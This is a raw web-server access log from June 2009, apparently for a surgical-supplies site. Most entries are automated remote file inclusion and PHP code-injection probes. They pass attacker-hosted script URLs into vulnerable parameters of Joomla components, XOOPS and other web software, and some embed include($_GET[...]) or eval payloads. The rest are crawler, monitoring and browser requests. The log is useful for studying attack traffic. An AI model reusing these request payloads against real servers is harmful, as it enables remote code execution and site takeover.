89.108.64.88 - - [08/Jun/2009:00:00:46 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.westsite.org.ru/404.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.812"
66.249.71.54 - - [08/Jun/2009:00:01:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L300C754D259242002C6E06V+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
70.85.165.10 - - [08/Jun/2009:00:01:23 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:01:23 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:00:01:25 -0400] "GET /logs/access_log.Q109052900//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:01:28 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:01:29 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
116.36.213.166 - - [08/Jun/2009:00:01:30 -0400] "GET /?sourcedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
116.36.213.166 - - [08/Jun/2009:00:01:30 -0400] "GET /logs/?sourcedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 200 4634 "-" "Mozilla/5.0"
116.36.213.166 - - [08/Jun/2009:00:01:30 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:01:48 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
116.36.213.166 - - [08/Jun/2009:00:02:10 -0400] "GET /logs/access_log.Q109052100%20%20/?sourcedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:00:02:17 -0400] "GET /logs/access_log.Q109052900//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:02:18 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
74.6.22.170 - - [08/Jun/2009:00:02:13 -0400] "GET /images/ACE_RCM_info.pdf HTTP/1.0" 200 897304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.221.130.2 - - [08/Jun/2009:00:02:21 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
222.231.1.113 - - [08/Jun/2009:00:02:25 -0400] "GET /logs//bbs/skin/zero_vote/ask_password.php?dir=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.231.1.113 - - [08/Jun/2009:00:02:25 -0400] "GET /logs/access_log.Q109050700//bbs/skin/zero_vote/ask_password.php?dir=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.231.1.113 - - [08/Jun/2009:00:02:25 -0400] "GET //bbs/skin/zero_vote/ask_password.php?dir=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.231.1.113 - - [08/Jun/2009:00:02:27 -0400] "GET //bbs/skin/zero_vote/ask_password.php?dir=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.231.1.113 - - [08/Jun/2009:00:02:27 -0400] "GET /logs/access_log.Q109050700//bbs/skin/zero_vote/ask_password.php?dir=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.231.1.113 - - [08/Jun/2009:00:02:27 -0400] "GET /logs//bbs/skin/zero_vote/ask_password.php?dir=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.231.1.113 - - [08/Jun/2009:00:02:29 -0400] "GET /logs/access_log.Q109052300//bbs/skin/zero_vote/ask_password.php?dir=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.231.1.113 - - [08/Jun/2009:00:02:31 -0400] "GET /logs/access_log.Q109052300//bbs/skin/zero_vote/ask_password.php?dir=http://www.omsklyvr.omit.ru/lang/mawar.txt????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:00:02:51 -0400] "GET /logs/access_log.Q109053000//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:03:53 -0400] "GET /logs/access_log.Q109053000//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:04:46 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:04:46 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:04:46 -0400] "GET /logs/access_log.Q109053000//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.59.12.99 - - [08/Jun/2009:00:04:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.2 - - [08/Jun/2009:00:05:15 -0400] "GET /logs/access_log.Q109053000//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:05:15 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:00:05:15 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
66.249.71.14 - - [08/Jun/2009:00:05:58 -0400] "GET /logs/access_log.Q108010300 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.189.18.73 - - [08/Jun/2009:00:06:01 -0400] "GET /errors.php?error=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.189.18.73 - - [08/Jun/2009:00:06:01 -0400] "GET /logs/errors.php?error=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.189.18.73 - - [08/Jun/2009:00:06:01 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.189.18.73 - - [08/Jun/2009:00:06:04 -0400] "GET /logs/errors.php?error=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.189.18.73 - - [08/Jun/2009:00:06:04 -0400] "GET /errors.php?error=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.189.18.73 - - [08/Jun/2009:00:06:04 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://harvestusa.org///administrator//cache/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.165.80.16 - - [08/Jun/2009:00:06:31 -0400] "GET /logs/access_log.Q109052100/show.php?path=http://www.die-grenzreiter.com/content/download/id.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
213.165.80.16 - - [08/Jun/2009:00:06:32 -0400] "GET /show.php?path=http://www.die-grenzreiter.com/content/download/id.txt? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
116.36.213.166 - - [08/Jun/2009:00:06:33 -0400] "GET /errors.php?error=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
116.36.213.166 - - [08/Jun/2009:00:06:33 -0400] "GET /logs/access_log.Q109052400%20%20/errors.php?error=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.165.80.16 - - [08/Jun/2009:00:06:33 -0400] "GET /logs/show.php?path=http://www.die-grenzreiter.com/content/download/id.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
116.36.213.166 - - [08/Jun/2009:00:06:33 -0400] "GET /logs/errors.php?error=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:06:37 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:06:38 -0400] "GET /logs/access_log.Q109052300//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
89.108.64.88 - - [08/Jun/2009:00:07:30 -0400] "GET /logs/access_log.Q109052200///?_SERVER[DOCUMENT_ROOT]=http://www.westsite.org.ru/404.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.812"
89.108.64.88 - - [08/Jun/2009:00:07:31 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.westsite.org.ru/404.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.812"
89.108.64.88 - - [08/Jun/2009:00:07:32 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.westsite.org.ru/404.txt??? HTTP/1.1" 200 4640 "-" "libwww-perl/5.812"
116.36.213.166 - - [08/Jun/2009:00:07:48 -0400] "GET /logs/error_log.Q109042900%20%20/errors.php?error=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.185.28.194 - - [08/Jun/2009:00:07:52 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.185.28.194 - - [08/Jun/2009:00:07:53 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
203.185.28.194 - - [08/Jun/2009:00:07:54 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
213.165.80.16 - - [08/Jun/2009:00:08:34 -0400] "GET /logs/error_log.Q109052100/show.php?path=http://www.die-grenzreiter.com/content/download/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
110.45.145.92 - - [08/Jun/2009:00:09:12 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://madiunkab.go.id/counter/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
209.59.12.99 - - [08/Jun/2009:00:09:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.145.92 - - [08/Jun/2009:00:10:14 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
110.45.145.92 - - [08/Jun/2009:00:10:14 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.108.64.88 - - [08/Jun/2009:00:10:48 -0400] "GET /logs/access_log.Q109050900///?_SERVER[DOCUMENT_ROOT]=http://www.westsite.org.ru/404.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.812"
117.110.57.130 - - [08/Jun/2009:00:10:54 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
117.110.57.130 - - [08/Jun/2009:00:10:54 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
117.110.57.130 - - [08/Jun/2009:00:10:54 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
110.45.145.92 - - [08/Jun/2009:00:11:12 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
110.45.145.92 - - [08/Jun/2009:00:11:16 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://madiunkab.go.id/counter/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
76.164.212.18 - - [08/Jun/2009:00:11:31 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
76.164.212.18 - - [08/Jun/2009:00:11:31 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
76.164.212.18 - - [08/Jun/2009:00:11:31 -0400] "GET /logs/access_log.Q109052400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
76.164.212.18 - - [08/Jun/2009:00:11:42 -0400] "GET /logs/access_log.Q109052600//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
173.54.14.191 - - [08/Jun/2009:00:12:37 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/seminars.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
173.54.14.191 - - [08/Jun/2009:00:12:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/seminars.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
173.54.14.191 - - [08/Jun/2009:00:12:37 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/seminars.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
173.54.14.191 - - [08/Jun/2009:00:12:37 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/seminars.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
62.140.23.185 - - [08/Jun/2009:00:12:39 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.140.23.185 - - [08/Jun/2009:00:12:39 -0400] "GET /logs/access_log.Q109053100%20%20///vwar/backup/errors.php?error=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
62.140.23.185 - - [08/Jun/2009:00:12:39 -0400] "GET ///vwar/backup/errors.php?error=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:00:13:04 -0400] "GET /logs/access_log.Q109052900%20//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
76.164.212.18 - - [08/Jun/2009:00:13:26 -0400] "GET /logs/access_log.Q109052400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
76.164.212.18 - - [08/Jun/2009:00:13:32 -0400] "GET /logs/access_log.Q109052600%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:13:38 -0400] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:13:39 -0400] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:13:39 -0400] "GET /logs/access_log.Q109053000%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:00:13:40 -0400] "GET /logs/access_log.Q109052900%20//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
74.6.22.170 - - [08/Jun/2009:00:12:48 -0400] "GET /images/ACE_BoneGraft_04.pdf HTTP/1.0" 200 9952673 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
116.36.213.166 - - [08/Jun/2009:00:14:05 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:14:24 -0400] "GET /logs/access_log.Q109010700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:14:25 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:14:25 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:14:37 -0400] "GET /logs/access_log.Q109052400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:14:37 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.22.204.193 - - [08/Jun/2009:00:14:37 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:00:15:03 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:00:15:03 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
62.140.23.185 - - [08/Jun/2009:00:15:17 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
62.140.23.185 - - [08/Jun/2009:00:15:17 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:00:15:31 -0400] "GET /logs/access_log.Q109052200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
74.6.22.170 - - [08/Jun/2009:00:15:33 -0400] "GET /logs/error_log.Q108021900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.85.165.10 - - [08/Jun/2009:00:15:40 -0400] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:15:40 -0400] "GET /logs/access_log.Q109053000%20%20/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:15:40 -0400] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.140.23.185 - - [08/Jun/2009:00:15:57 -0400] "GET /logs//trans/trans.php?trans=&p=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
62.140.23.185 - - [08/Jun/2009:00:15:57 -0400] "GET //trans/trans.php?trans=&p=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
62.140.23.185 - - [08/Jun/2009:00:16:06 -0400] "GET /logs/access_log.Q109052400%20%20//trans/trans.php?trans=&p=http://www.bildpunktlinden.de//components/com_sef/1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:00:16:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.22.204.193 - - [08/Jun/2009:00:16:06 -0400] "GET /logs/access_log.Q109052600//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
75.145.152.113 - - [08/Jun/2009:00:16:22 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
75.145.152.113 - - [08/Jun/2009:00:16:22 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
75.145.152.113 - - [08/Jun/2009:00:16:22 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
75.125.245.26 - - [08/Jun/2009:00:16:23 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
75.125.245.26 - - [08/Jun/2009:00:16:23 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
75.125.245.26 - - [08/Jun/2009:00:16:23 -0400] "GET /logs/access_log.Q109050300%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
75.125.245.26 - - [08/Jun/2009:00:16:23 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
75.145.152.113 - - [08/Jun/2009:00:16:26 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
123.24.171.57 - - [08/Jun/2009:00:16:30 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)"
123.24.171.57 - - [08/Jun/2009:00:16:30 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)"
123.24.171.57 - - [08/Jun/2009:00:16:36 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)"
123.24.171.57 - - [08/Jun/2009:00:16:36 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)"
203.185.28.194 - - [08/Jun/2009:00:16:59 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:00:17:12 -0400] "GET /!rfi%20administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:00:17:12 -0400] "GET /logs/!rfi%20administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
64.34.181.87 - - [08/Jun/2009:00:17:12 -0400] "GET /logs/access_log.Q109052200/!rfi%20administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top40argentina.com.ar/php/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
203.185.28.194 - - [08/Jun/2009:00:17:52 -0400] "GET /logs/error_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:18:33 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:18:33 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:00:18:38 -0400] "GET /logs/access_log.Q109010700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
